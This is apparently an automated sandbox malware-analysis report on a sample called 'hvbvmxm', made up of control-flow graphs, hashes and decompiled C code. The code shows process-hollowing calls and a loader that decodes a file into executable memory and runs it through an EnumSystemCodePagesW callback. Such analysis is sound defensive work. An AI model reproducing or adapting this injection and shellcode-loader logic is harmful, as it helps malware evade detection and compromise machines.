                                                  control_flow_graph 245 b8091e-b80931 246 b80934-b80938 245->246 247 b8093a-b8094e 246->247 248 b80950-b8095d 246->248 247->246 249 b80960-b80964 248->249 250 b8097c-b80989 249->250 251 b80966-b8097a 249->251 252 b8098c-b80990 250->252 251->249 253 b809a8-b80a8e call b80005 call b800e4 * 8 252->253 254 b80992-b809a6 252->254 273 b80a90-b80a9a 253->273 274 b80aa5 253->274 254->252 273->274 275 b80a9c-b80aa3 273->275 276 b80aa9-b80ac5 274->276 275->276 278 b80ace 276->278 279 b80ac7-b80ac9 276->279 281 b80ad5-b80aff CreateProcessW 278->281 280 b80e4d-b80e4e 279->280 283 b80b01 281->283 284 b80b06-b80b22 GetThreadContext 281->284 285 b80e01-b80e05 283->285 286 b80b29-b80b46 ReadProcessMemory 284->286 287 b80b24 284->287 290 b80e4a-b80e4c 285->290 291 b80e07-b80e0b 285->291 288 b80b48 286->288 289 b80b4d-b80b56 286->289 287->285 288->285 292 b80b58-b80b67 289->292 293 b80b7d-b80b9c call b80e97 289->293 290->280 294 b80e0d-b80e18 291->294 295 b80e1e-b80e22 291->295 292->293 296 b80b69-b80b6f call b811f6 292->296 308 b80b9e 293->308 309 b80ba3-b80bc4 call b80faf 293->309 294->295 298 b80e2a-b80e2e 295->298 299 b80e24 295->299 307 b80b74-b80b76 296->307 300 b80e30 298->300 301 b80e36-b80e3a 298->301 299->298 300->301 305 b80e3c-b80e41 call b811f6 301->305 306 b80e46-b80e48 301->306 305->306 306->280 307->293 311 b80b78 307->311 308->285 314 b80c09-b80c29 call b80faf 309->314 315 b80bc6-b80bcd 309->315 311->285 322 b80c2b 314->322 323 b80c30-b80c45 call b800b5 314->323 316 b80bcf-b80bfb call b80faf 315->316 317 b80c04 315->317 324 b80bfd 316->324 325 b80c02 316->325 317->285 322->285 328 b80c4e-b80c58 323->328 324->285 325->314 329 b80c8a-b80c8e 328->329 330 b80c5a-b80c88 call b800b5 328->330 332 b80d6e-b80d8a call b81289 329->332 333 b80c94-b80ca2 329->333 330->328 340 b80d8c 332->340 341 b80d8e-b80daf SetThreadContext 332->341 333->332 336 b80ca8-b80cb6 333->336 336->332 339 b80cbc-b80cdc 336->339 342 b80cdf-b80ce3 339->342 340->285 343 b80db1 341->343 344 b80db3-b80dbd call b81147 341->344 342->332 345 b80ce9-b80cfe 342->345 343->285 351 b80dbf 344->351 352 b80dc1-b80dc5 344->352 347 b80d10-b80d14 345->347 349 b80d51-b80d69 347->349 350 b80d16-b80d22 347->350 349->342 353 b80d4f 350->353 354 b80d24-b80d4d 350->354 351->285 355 b80dcd-b80dd1 352->355 356 b80dc7 352->356 353->347 354->353 358 b80dd9-b80ddd 355->358 359 b80dd3 355->359 356->355 360 b80ddf 358->360 361 b80de5-b80de9 358->361 359->358 360->361 362 b80deb-b80df0 call b811f6 361->362 363 b80df5-b80dfb 361->363 362->363 363->281 363->285
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00B80AFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: D
                                                  • API String ID: 963392458-2746444292
                                                  • Opcode ID: b07659f93890cc848999820ed0069d9183faa54d6d5d02b225e023f43755ab63
                                                  • Instruction ID: 11cf940c248c8aa0f5697d02fae58a56a2d62019a8949fbd19bfe42512503083
                                                  • Opcode Fuzzy Hash: b07659f93890cc848999820ed0069d9183faa54d6d5d02b225e023f43755ab63
                                                  • Instruction Fuzzy Hash: B302E170D20209EFDB54EF94C985BADBBF5FF04345F2040A9E515BA2A1D774AA88DF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004117A7 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 365 4117a7-4117ac 366 4117ae-4117c6 365->366 367 4117d4-4117dd 366->367 368 4117c8-4117cc 366->368 369 4117ef 367->369 370 4117df-4117e2 367->370 368->367 371 4117ce-4117d2 368->371 375 4117f1-4117fe GetStdHandle 369->375 373 4117e4-4117e9 370->373 374 4117eb-4117ed 370->374 372 41184d-411851 371->372 372->366 376 411857-41185a 372->376 373->375 374->375 377 411800-411802 375->377 378 41180d 375->378 377->378 379 411804-41180b GetFileType 377->379 380 41180f-411811 378->380 379->380 381 411813-41181c 380->381 382 41182f-411841 380->382 383 411824-411827 381->383 384 41181e-411822 381->384 382->372 385 411843-411846 382->385 383->372 386 411829-41182d 383->386 384->372 385->372 386->372
                                                  C-Code - Quality: 84%
                                                  			E004117A7() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x4217e8 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x421aec; // 0x57fdd8
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










                                                  0x004117ac
                                                  0x004117ae
                                                  0x004117b2
                                                  0x004117bb
                                                  0x004117c6
                                                  0x004117d6
                                                  0x004117da
                                                  0x004117dd
                                                  0x004117ef
                                                  0x004117df
                                                  0x004117e2
                                                  0x004117eb
                                                  0x004117e4
                                                  0x004117e7
                                                  0x004117e7
                                                  0x004117e2
                                                  0x004117f1
                                                  0x004117f9
                                                  0x004117fe
                                                  0x0041180d
                                                  0x00411804
                                                  0x00411805
                                                  0x00411805
                                                  0x00411811
                                                  0x0041182f
                                                  0x00411833
                                                  0x0041183a
                                                  0x00411841
                                                  0x00411843
                                                  0x00411846
                                                  0x00411846
                                                  0x00411813
                                                  0x00411813
                                                  0x00411816
                                                  0x0041181c
                                                  0x00411827
                                                  0x00411829
                                                  0x00411829
                                                  0x0041181e
                                                  0x0041181e
                                                  0x0041181e
                                                  0x0041181c
                                                  0x004117ce
                                                  0x004117ce
                                                  0x004117ce
                                                  0x0041184d
                                                  0x0041184e
                                                  0x0041185a

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 004117F3
                                                  • GetFileType.KERNELBASE(00000000), ref: 00411805
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID:
                                                  • API String ID: 3000768030-0
                                                  • Opcode ID: bf012132e648b38d15b19865d44f8fee2aab9814c3c2c215d4ecae7c09de6ce5
                                                  • Instruction ID: a3664b0028b3f5ce1eaa5c130127368b884a826e018fd639eec931c8e0f35f93
                                                  • Opcode Fuzzy Hash: bf012132e648b38d15b19865d44f8fee2aab9814c3c2c215d4ecae7c09de6ce5
                                                  • Instruction Fuzzy Hash: 7111EB3160471186CB305F3ECCC86A77A95A766330B34071BD2B686BF1C738C8C6D259
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409702 Relevance: 3.1, APIs: 2, Instructions: 53filememoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 387 409702-409783 GetConsoleWindow ShowWindow call 40dc06 391 409785-409787 387->391 392 40978c-409803 call 40d210 CreateFileW GetFileSize VirtualAlloc ReadFile 387->392 393 40a05a-40a05d 391->393 396 409809-4099b0 392->396 397 4099b2 396->397 398 4099b7-4099d6 EnumSystemCodePagesW call 40dbeb 396->398 397->396 401 4099e1-4099e7 398->401 402 4099f5-409a33 GetOEMCP call 40dbe0 401->402 403 4099e9-4099f3 401->403 407 409a35-409a3a 402->407 408 409a3f-409a46 402->408 403->401 407->393 409 409a51-409a57 408->409 410 409ed0-409ed7 409->410 411 409a5d-409a6d 409->411 413 409ee3-409ee7 410->413 414 409ed9-409ede 410->414 412 409a70-409a80 411->412 417 409a82-409a87 412->417 418 409ab5-409aba 412->418 415 409ef0-409ef4 413->415 416 409ee9 413->416 414->393 419 409ef6 415->419 420 409efd-409f1d call 402960 415->420 416->415 421 409a89-409a9b 417->421 422 409aac-409ab3 417->422 423 409abd-409acd 418->423 419->420 431 409f29-409f2d 420->431 432 409f1f-409f24 420->432 421->418 425 409a9d-409aaa 421->425 422->423 426 409adb-409aeb 423->426 427 409acf-409ad6 423->427 425->412 425->422 430 409aee-409afe 426->430 427->409 433 409b00-409b05 430->433 434 409b33-409b38 430->434 436 409f97-409fa3 call 4046f0 431->436 437 409f2f-409f50 GetStdHandle * 2 431->437 432->393 438 409b07-409b19 433->438 439 409b2a-409b31 433->439 435 409b3b-409b4b 434->435 441 409b6d-409b7d 435->441 442 409b4d-409b61 435->442 451 409fa5-409faa 436->451 452 409faf-409fcb GetStartupInfoW 436->452 444 409f52-409f59 437->444 445 409f5b-409f6c call 404690 437->445 438->434 440 409b1b-409b28 438->440 439->435 440->430 440->439 447 409b80-409b90 441->447 442->441 444->445 448 409f88 444->448 461 409f86 445->461 462 409f6e-409f7a call 4034e0 445->462 453 409b92-409b97 447->453 454 409bc5-409bca 447->454 450 409f92 448->450 456 40a049-40a050 450->456 451->393 457 409fd1-409fe4 452->457 458 409b99-409bab 453->458 459 409bbc-409bc3 453->459 460 409bcd-409bdd 454->460 456->393 463 40a055 call 404ca0 456->463 457->457 464 409fe6-40a01a call 406640 457->464 458->454 465 409bad-409bba 458->465 459->460 466 409c46-409c56 460->466 467 409bdf-409bee 460->467 461->450 462->461 474 409f7c-409f81 462->474 463->393 483 40a02b 464->483 484 40a01c-40a029 464->484 465->447 465->459 469 409c59-409c69 466->469 471 409bf0-409bf5 467->471 472 409bfa-409c19 call 40e35e 467->472 476 409ca1-409ca6 469->476 477 409c6b-409c70 469->477 471->393 487 409c24-409c2b 472->487 488 409c1b-409c22 472->488 474->393 479 409cac-409cbf 476->479 481 409c72-409c84 477->481 482 409c95-409c9f 477->482 485 409cc1-409cd0 479->485 486 409d28-409d38 479->486 481->476 489 409c86-409c93 481->489 482->479 490 40a035-40a043 ShowWindow 483->490 484->490 491 409cd2-409cd7 485->491 492 409cdc-409cfb call 40e35e 485->492 495 409d3b-409d4b 486->495 493 409c37-409c3c 487->493 494 409c2d-409c35 487->494 488->487 488->493 489->469 489->482 490->456 491->393 507 409d06-409d0d 492->507 508 409cfd-409d04 492->508 493->393 494->493 497 409c41 494->497 498 409d83-409d88 495->498 499 409d4d-409d52 495->499 497->466 500 409d8e-409da1 498->500 502 409d54-409d66 499->502 503 409d77-409d81 499->503 505 409da3-409db2 500->505 506 409df5-409e05 500->506 502->498 504 409d68-409d75 502->504 503->500 504->495 504->503 509 409db4-409db9 505->509 510 409dbe-409de4 call 40e35e 505->510 513 409e08-409e18 506->513 511 409d19-409d1e 507->511 512 409d0f-409d17 507->512 508->507 508->511 509->393 525 409df0 510->525 526 409de6-409deb 510->526 511->393 512->511 515 409d23 512->515 516 409e50-409e55 513->516 517 409e1a-409e1f 513->517 515->486 518 409e5b-409e6e 516->518 520 409e21-409e33 517->520 521 409e44-409e4e 517->521 523 409e70-409e7f 518->523 524 409ec1-409ec6 518->524 520->516 522 409e35-409e42 520->522 521->518 522->513 522->521 527 409e81-409e86 523->527 528 409e8b-409eb0 call 40e35e 523->528 524->393 525->506 526->393 527->393 531 409eb2-409eb7 528->531 532 409ebc 528->532 531->393 532->524
                                                  C-Code - Quality: 82%
                                                  			E00409702(void* __eax, intOrPtr* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12, int _a20, int _a24, int _a36) {
				signed int _v8;
				void* _v12;
				signed short* _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				char* _v40;
				char* _v44;
				signed int _v48;
				char* _v52;
				signed int _v56;
				char* _v60;
				signed int _v64;
				signed int _v68;
				char* _v72;
				signed int _v76;
				char* _v80;
				short _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				int _v108;
				long _v112;
				signed int _v116;
				void* _v120;
				int _v124;
				int _v128;
				int _v132;
				int _v136;
				int _v140;
				int _v144;
				int _v148;
				intOrPtr _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				long _v192;
				struct _STARTUPINFOW _v260;
				struct HWND__* _t347;
				int _t349;
				void* _t353;
				void* _t355;
				signed int _t404;
				signed int _t406;
				long _t414;
				signed int _t419;
				short _t421;
				signed int _t426;
				signed int _t427;
				short _t431;
				signed int _t434;
				signed int _t435;
				signed int _t438;
				signed int _t441;
				intOrPtr _t444;
				short _t445;
				signed int _t449;
				signed int _t454;
				short _t457;
				intOrPtr _t506;
				signed int _t516;
				signed int _t517;
				short _t519;
				signed int _t522;
				signed int _t523;
				short _t527;
				short _t531;
				short _t542;
				intOrPtr _t588;
				signed int _t591;
				struct HWND__* _t597;
				signed int _t599;
				signed int _t600;
				short _t602;
				short _t607;
				signed int _t610;
				signed int _t611;
				short _t624;
				short _t630;
				signed int _t632;
				void* _t634;
				void* _t637;
				void* _t639;
				void* _t640;
				void* _t641;
				void* _t642;

				_t633 = __edi;
				_pop(es);
				_pop(es);
				_pop(es);
				_pop(es);
				_pop(es);
				_pop(es);
				_pop(es);
				_pop(es);
				_pop(es);
				_pop(es);
				_pop(es);
				_pop(es);
				_pop(es);
				_t347 = __eax +  *__ebx + 5;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_v72 = 0;
				_a20 = 0;
				_a24 = 0;
				_v108 = 0;
				_v144 = 0;
				_a36 = 0;
				_a12 = 0;
				__imp__GetConsoleWindow(_t634, es, es); // executed
				ShowWindow(_t347, 0); // executed
				_push(0x3d0900); // executed
				_t349 = E0040DC06(); // executed
				_t639 = _t637 - 0x100 + 4;
				_a12 = _t349;
				if(_a12 != 0) {
					E0040D210(__edi, _v32, 0x54, 0x3d0900);
					_t640 = _t639 + 0xc;
					__eflags = 4;
					_t353 = CreateFileW( *(_a8 + (4 << 0)), 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_v120 = _t353;
					_v112 = GetFileSize(_v120, 0);
					_t355 = VirtualAlloc(0, _v112, 0x3000, 0x40); // executed
					_v12 = _t355;
					ReadFile(_v120, _v12, _v112,  &_v192, 0); // executed
					while(1) {
						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x000000a5;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x68;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 0x6f;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x28;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 0xc6;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 0xf5;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 0xf8;
						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000002e;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 0x56;
						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000006d;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x50;
						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x00000097;
						_v8 = _v8 + 1;
						__eflags = _v8 - _v112;
						if(_v8 >= _v112) {
							break;
						}
					}
					EnumSystemCodePagesW(_v12, 0); // executed
					E0040DBEB(_v32);
					_t641 = _t640 + 4;
					_v8 = 0;
					while(1) {
						__eflags = _v8 - _a4;
						if(_v8 >= _a4) {
							break;
						}
						 *0x41feac = 0x1f7;
						_t632 = _v8 + 1;
						__eflags = _t632;
						_v8 = _t632;
					}
					 *0x41ff4c = GetOEMCP();
					_t506 =  *0x41ff4c; // 0x0
					 *0x41ff48 = _t506;
					 *0x41ff38 = 0x32;
					_push(4);
					_t588 =  *0x41ff38; // 0x0
					_push(_t588);
					_t404 = E0040DBE0();
					_t642 = _t641 + 8;
					 *0x41ff34 = _t404;
					__eflags =  *0x41ff34;
					if( *0x41ff34 != 0) {
						_v8 = 1;
						while(1) {
							L14:
							__eflags = _v8 - _a4;
							if(_v8 >= _a4) {
								break;
							}
							_v44 = L"--headless";
							_v36 =  *((intOrPtr*)(_a8 + _v8 * 4));
							while(1) {
								_t599 = _v36;
								_t421 =  *_t599;
								_v100 = _t421;
								__eflags = _t421 -  *_v44;
								if(_t421 !=  *_v44) {
									break;
								}
								__eflags = _v100;
								if(_v100 == 0) {
									L20:
									_v124 = 0;
								} else {
									_t599 = _v36;
									_t457 =  *((intOrPtr*)(_t599 + 2));
									_v102 = _t457;
									_t132 =  &(_v44[2]); // 0x68002d
									__eflags = _t457 -  *_t132;
									if(_t457 !=  *_t132) {
										break;
									} else {
										_v36 = _v36 + 4;
										_v44 =  &(_v44[4]);
										__eflags = _v102;
										if(_v102 != 0) {
											continue;
										} else {
											goto L20;
										}
									}
								}
								L22:
								_v156 = _v124;
								__eflags = _v156;
								if(_v156 != 0) {
									_v52 = L"--unix";
									_v48 =  *((intOrPtr*)(_a8 + _v8 * 4));
									while(1) {
										_t516 = _v48;
										_t602 =  *_t516;
										_v104 = _t602;
										__eflags = _t602 -  *_v52;
										if(_t602 !=  *_v52) {
											break;
										}
										__eflags = _v104;
										if(_v104 == 0) {
											L29:
											_v128 = 0;
										} else {
											_t516 = _v48;
											_t630 =  *((intOrPtr*)(_t516 + 2));
											_v106 = _t630;
											_t158 =  &(_v52[2]); // 0x75002d
											__eflags = _t630 -  *_t158;
											if(_t630 !=  *_t158) {
												break;
											} else {
												_v48 = _v48 + 4;
												_v52 =  &(_v52[4]);
												__eflags = _v106;
												if(_v106 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										_v160 = _v128;
										__eflags = _v160;
										if(_v160 != 0) {
											_v60 = L"--width";
											_v56 =  *((intOrPtr*)(_a8 + _v8 * 4));
											while(1) {
												_t426 = _v56;
												_t519 =  *_t426;
												_v82 = _t519;
												__eflags = _t519 -  *_v60;
												if(_t519 !=  *_v60) {
													break;
												}
												__eflags = _v82;
												if(_v82 == 0) {
													L38:
													_v132 = 0;
												} else {
													_t426 = _v56;
													_t542 =  *((intOrPtr*)(_t426 + 2));
													_v84 = _t542;
													_t184 =  &(_v60[2]); // 0x77002d
													__eflags = _t542 -  *_t184;
													if(_t542 !=  *_t184) {
														break;
													} else {
														_v56 = _v56 + 4;
														_v60 =  &(_v60[4]);
														__eflags = _v84;
														if(_v84 != 0) {
															continue;
														} else {
															goto L38;
														}
													}
												}
												L40:
												_v164 = _v132;
												__eflags = _v164;
												if(_v164 != 0) {
													_v40 = L"--height";
													_v64 =  *((intOrPtr*)(_a8 + _v8 * 4));
													while(1) {
														_t522 = _v64;
														_t607 =  *_t522;
														_v98 = _t607;
														__eflags = _t607 -  *_v40;
														if(_t607 !=  *_v40) {
															break;
														}
														__eflags = _v98;
														if(_v98 == 0) {
															L54:
															_v136 = 0;
														} else {
															_t522 = _v64;
															_t624 =  *((intOrPtr*)(_t522 + 2));
															_v86 = _t624;
															_t222 =  &(_v40[2]); // 0x68002d
															__eflags = _t624 -  *_t222;
															if(_t624 !=  *_t222) {
																break;
															} else {
																_v64 = _v64 + 4;
																_v40 =  &(_v40[4]);
																__eflags = _v86;
																if(_v86 != 0) {
																	continue;
																} else {
																	goto L54;
																}
															}
														}
														L56:
														_v168 = _v136;
														__eflags = _v168;
														if(_v168 != 0) {
															_v72 = L"--signal";
															_v68 =  *((intOrPtr*)(_a8 + _v8 * 4));
															while(1) {
																_t610 = _v68;
																_t431 =  *_t610;
																_v88 = _t431;
																__eflags = _t431 -  *_v72;
																if(_t431 !=  *_v72) {
																	break;
																}
																__eflags = _v88;
																if(_v88 == 0) {
																	L70:
																	_v140 = 0;
																} else {
																	_t610 = _v68;
																	_t445 =  *((intOrPtr*)(_t610 + 2));
																	_v90 = _t445;
																	_t260 =  &(_v72[2]); // 0x73002d
																	__eflags = _t445 -  *_t260;
																	if(_t445 !=  *_t260) {
																		break;
																	} else {
																		_v68 = _v68 + 4;
																		_v72 =  &(_v72[4]);
																		__eflags = _v90;
																		if(_v90 != 0) {
																			continue;
																		} else {
																			goto L70;
																		}
																	}
																}
																L72:
																_v172 = _v140;
																__eflags = _v172;
																if(_v172 != 0) {
																	_v80 = L"--server";
																	_v76 =  *((intOrPtr*)(_a8 + _v8 * 4));
																	while(1) {
																		_t434 = _v76;
																		_t527 =  *_t434;
																		_v92 = _t527;
																		__eflags = _t527 -  *_v80;
																		if(_t527 !=  *_v80) {
																			break;
																		}
																		__eflags = _v92;
																		if(_v92 == 0) {
																			L83:
																			_v144 = 0;
																		} else {
																			_t434 = _v76;
																			_t531 =  *((intOrPtr*)(_t434 + 2));
																			_v94 = _t531;
																			_t296 =  &(_v80[2]); // 0x73002d
																			__eflags = _t531 -  *_t296;
																			if(_t531 !=  *_t296) {
																				break;
																			} else {
																				_v76 = _v76 + 4;
																				_v80 =  &(_v80[4]);
																				__eflags = _v94;
																				if(_v94 != 0) {
																					continue;
																				} else {
																					goto L83;
																				}
																			}
																		}
																		L85:
																		_v176 = _v144;
																		__eflags = _v176;
																		if(_v176 != 0) {
																			_t414 = 1;
																		} else {
																			_v8 = _v8 + 1;
																			__eflags = _v8 - _a4;
																			if(_v8 != _a4) {
																				_t438 = E0040E35E( *((intOrPtr*)(_a8 + _v8 * 4)),  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
																				_t642 = _t642 + 0xc;
																				 *0x41fea8 = _t438;
																				__eflags =  *_v16 & 0x0000ffff;
																				if(( *_v16 & 0x0000ffff) == 0) {
																					goto L13;
																				} else {
																					_t414 = 1;
																				}
																			} else {
																				_t414 = 1;
																			}
																		}
																		goto L118;
																	}
																	asm("sbb eax, eax");
																	_t435 = _t434 | 0x00000001;
																	__eflags = _t435;
																	_v144 = _t435;
																	goto L85;
																} else {
																	_v8 = _v8 + 1;
																	__eflags = _v8 - _a4;
																	if(_v8 != _a4) {
																		_t444 = E0040E35E(_v8,  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
																		_t642 = _t642 + 0xc;
																		_v152 = _t444;
																		__eflags =  *_v16 & 0x0000ffff;
																		if(( *_v16 & 0x0000ffff) == 0) {
																			goto L13;
																		} else {
																			_t414 = 1;
																		}
																	} else {
																		_t414 = 1;
																	}
																}
																goto L118;
															}
															asm("sbb edx, edx");
															_t611 = _t610 | 0x00000001;
															__eflags = _t611;
															_v140 = _t611;
															goto L72;
														} else {
															_v8 = _v8 + 1;
															__eflags = _v8 - _a4;
															if(_v8 != _a4) {
																_t449 = E0040E35E(_a8,  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
																_t642 = _t642 + 0xc;
																_v20 = _t449;
																__eflags = _v20;
																if(_v20 != 0) {
																	L61:
																	__eflags = _v20 - 0xffff;
																	if(_v20 > 0xffff) {
																		goto L63;
																	} else {
																		__eflags =  *_v16 & 0x0000ffff;
																		if(( *_v16 & 0x0000ffff) == 0) {
																			goto L13;
																		} else {
																			goto L63;
																		}
																	}
																} else {
																	__eflags =  *0x41feb4;
																	if( *0x41feb4 == 0) {
																		L63:
																		_t414 = 1;
																	} else {
																		goto L61;
																	}
																}
															} else {
																_t414 = 1;
															}
														}
														goto L118;
													}
													asm("sbb ecx, ecx");
													_t523 = _t522 | 0x00000001;
													__eflags = _t523;
													_v136 = _t523;
													goto L56;
												} else {
													_v8 = _v8 + 1;
													__eflags = _v8 - _a4;
													if(_v8 != _a4) {
														_t454 = E0040E35E( *((intOrPtr*)(_a8 + _v8 * 4)),  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
														_t642 = _t642 + 0xc;
														_v24 = _t454;
														__eflags = _v24;
														if(_v24 != 0) {
															L45:
															__eflags = _v24 - 0xffff;
															if(_v24 > 0xffff) {
																goto L47;
															} else {
																__eflags =  *_v16 & 0x0000ffff;
																if(( *_v16 & 0x0000ffff) == 0) {
																	goto L13;
																} else {
																	goto L47;
																}
															}
														} else {
															__eflags =  *0x41feb4;
															if( *0x41feb4 == 0) {
																L47:
																_t414 = 1;
															} else {
																goto L45;
															}
														}
													} else {
														_t414 = 1;
													}
												}
												goto L118;
											}
											asm("sbb eax, eax");
											_t427 = _t426 | 0x00000001;
											__eflags = _t427;
											_v132 = _t427;
											goto L40;
										} else {
											 *0x41feb4 = 1;
											 *0x41feb8 = 1;
											_v116 = 1;
											goto L13;
										}
										goto L118;
									}
									asm("sbb ecx, ecx");
									_t517 = _t516 | 0x00000001;
									__eflags = _t517;
									_v128 = _t517;
									goto L31;
								} else {
									_v116 = 1;
									L13:
									_t441 = _v8 + 1;
									__eflags = _t441;
									_v8 = _t441;
									goto L14;
								}
								goto L118;
							}
							asm("sbb edx, edx");
							_t600 = _t599 | 0x00000001;
							__eflags = _t600;
							_v124 = _t600;
							goto L22;
						}
						__eflags =  *0x41fea8;
						if( *0x41fea8 != 0) {
							__eflags = _v24;
							if(_v24 == 0) {
								_v24 = 0x50;
							}
							__eflags = _v20;
							if(__eflags == 0) {
								_v20 = 0x96;
							}
							_t508 = _v20;
							 *0x41feb0 = E00402960(_v20, __eflags, 0x41fea8, 1, _v24, _v20);
							__eflags =  *0x41feb0;
							if( *0x41feb0 != 0) {
								__eflags = _v116;
								if(_v116 == 0) {
									_t406 = E004046F0(_t633, 0x41fea8);
									__eflags = _t406;
									if(_t406 != 0) {
										GetStartupInfoW( &_v260);
										_v28 = _v260.lpTitle;
										_t591 = _v28 + 2;
										__eflags = _t591;
										_v180 = _t591;
										do {
											_v96 =  *_v28;
											_v28 = _v28 + 2;
											__eflags = _v96;
										} while (_v96 != 0);
										_v184 = _v28 - _v180 >> 1;
										E00406640(0x41fea8, _v260.lpTitle, _v184 << 1);
										__eflags = _v260.dwFlags & 0x00000001;
										if((_v260.dwFlags & 0x00000001) == 0) {
											_v148 = 5;
										} else {
											_v148 = _v260.wShowWindow & 0x0000ffff;
										}
										_t597 =  *0x41ff50; // 0x0
										ShowWindow(_t597, _v148);
										goto L117;
									} else {
										_t414 = 1;
									}
								} else {
									 *0x41ff58 = GetStdHandle(0xfffffff6);
									 *0x41ff5c = GetStdHandle(0xfffffff5);
									__eflags =  *0x41ff58;
									if( *0x41ff58 != 0) {
										L103:
										E00404690(0x41fea8);
										__eflags =  *0x41feb4;
										if( *0x41feb4 != 0) {
											L106:
											goto L108;
										} else {
											_t419 = E004034E0(_t508, 0x41fea8);
											__eflags = _t419;
											if(_t419 != 0) {
												goto L106;
											} else {
												_t414 = 1;
											}
										}
									} else {
										__eflags =  *0x41ff5c;
										if( *0x41ff5c == 0) {
											 *0x41febc = 1;
											L108:
											L117:
											_t414 = E00404CA0(0x41fea8, _v152);
										} else {
											goto L103;
										}
									}
								}
							} else {
								_t414 = 1;
							}
						} else {
							_t414 = 1;
						}
					} else {
						_t414 = 1;
					}
				} else {
					_t414 = 0;
				}
				L118:
				return _t414;
			}









































































































                                                  0x00409702
